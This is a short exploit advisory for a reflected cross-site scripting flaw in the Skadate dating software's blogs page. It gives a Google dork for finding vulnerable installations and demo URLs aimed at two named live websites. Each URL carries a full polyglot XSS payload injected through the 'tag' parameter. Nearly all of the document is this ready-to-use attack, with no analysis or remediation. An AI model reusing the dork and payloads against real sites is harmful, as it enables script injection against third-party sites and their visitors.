# Exploit Title: Skadate Blogs Cross Site Scripting
# Date: 7.08.2011
# Author: Sony
# Software Link: http://www.skadate.com/
# Google Dorks: member/blogs.php?tag= povered by skadate
# Blog : http://st2tea.blogspot.com
..................................................................

Demo:


http://www.latinamericanface.com/member/blogs.php?tag=blog+[XSS]

http://www.latinamericanface.com/member/blogs.php?tag=blog+%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E

http://www.curvez.com/member/blogs.php?tag=blog+%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E